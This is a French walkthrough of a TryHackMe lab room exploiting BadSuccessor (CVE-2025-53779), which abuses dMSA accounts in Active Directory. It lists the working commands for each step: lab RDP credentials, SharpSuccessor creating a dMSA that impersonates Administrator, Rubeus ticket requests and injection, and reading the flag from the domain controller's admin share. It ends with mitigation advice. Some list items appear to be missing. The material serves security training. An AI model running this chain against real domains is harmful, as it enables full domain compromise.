
Une salle TryHackme couvrant l'exploitation de la CVE-2025-53779 utilisant windows
Dans cette salle, nous explorons la technique d'escalade de privilèges BadSuccessor, une vulnérabilité qui abuse des comptes de service gérés délégués (dMSA) dans Active Directory. L'attaque permet à un utilisateur disposant d'un contrôle suffisant sur un objet dMSA d'usurper l'identité d'un autre compte et potentiellement d'atteindre les privilèges d'Administrateur de domaine.
Salle : https://tryhackme.com/room/adbadsuccessor
Difficulté : Moyenne
Date : 05/06/2026
Version : 1.0
Objectif : Démontrer comment les comptes de service gérés délégués peuvent être abusés pour escalader les privilèges et compromettre un environnement Active Directory.
Rôle : Terry Byte (tbyte)
But : Évaluer la sécurité d'un environnement Active Directory nouvellement déployé et déterminer s'il est vulnérable à l'attaque BadSuccessor.
L'attaque se compose de deux phases principales :
xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
Déplacez-vous dans le répertoire Proof-of-Concept :
cd C:\PoC
Vérifiez le contenu : dir
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
notepad Get-BadSuccessorOUPermissions.ps1
.\Get-BadSuccessorOUPermissions.ps1
Utilisez SharpSuccessor pour créer un compte de service géré délégué qui usurpe l'identité du compte Administrateur :
.\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
Que se passe-t-il ?
Utilisez Rubeus pour obtenir un Ticket d'octroi de ticket (TGT) délégué :
.\Rubeus.exe tgtdeleg /nowrap
La commande retourne un ticket Kerberos encodé en Base64.
Copiez le ticket généré.
.\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
Résultat :
Un nouveau ticket Kerberos est injecté en mémoire pour le compte dMSA.
Utilisez le ticket dMSA pour obtenir l'accès aux services s'exécutant sous le contexte Administrateur :
.\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
Résultat :
dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
Lisez le drapeau stocké sur le bureau de l'Administrateur :
Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
Drapeau obtenu avec succès.
BadSuccessor démontre comment les comptes de service gérés délégués peuvent introduire des voies d'escalade de privilèges dans les environnements Active Directory. Active Directory sert de colonne vertébrale d'identité pour de nombreuses organisations, les vulnérabilités affectant Kerberos et la délégation de comptes peuvent avoir des conséquences graves.
Un attaquant disposant de permissions suffisantes sur un objet dMSA peut :
Pour atténuer BadSuccessor (CVE-2025-53779), les organisations doivent appliquer rapidement les mises à jour de sécurité de Microsoft, restreindre et examiner les permissions dMSA, surveiller les activités Kerberos suspectes, auditer les relations de délégation et appliquer le principe du moindre privilège. Des examens réguliers des paramètres de délégation d'Active Directory peuvent aider à identifier et réduire les voies potentielles d'escalade de privilèges.
Cette salle a fourni une expérience pratique précieuse avec :